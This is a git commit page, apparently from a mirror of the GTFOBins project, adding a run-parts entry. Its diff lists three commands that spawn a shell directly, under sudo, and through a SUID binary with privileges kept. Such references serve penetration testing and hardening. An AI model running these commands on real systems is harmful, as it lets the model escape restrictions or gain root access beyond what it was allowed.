1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 16:26:01 +02:00

Add run-parts

This commit is contained in:
egre55 2018-11-12 12:40:10 +00:00 committed by Andrea Cardaci
parent 3cbfa05169
commit d5405933d1

9
_gtfobins/run-parts.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: run-parts --new-session --regex '^sh$' /bin
sudo:
- code: sudo run-parts --new-session --regex '^sh$' /bin
suid:
- code: ./run-parts --new-session --regex '^sh$' /bin --arg='-p'
---